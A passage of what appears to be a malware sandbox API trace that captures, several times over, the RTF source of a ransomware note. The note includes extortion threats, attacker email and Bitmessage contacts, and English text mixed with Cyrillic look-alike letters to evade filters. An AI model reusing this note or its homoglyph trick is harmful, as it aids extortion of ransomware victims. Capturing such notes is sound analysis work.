tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" 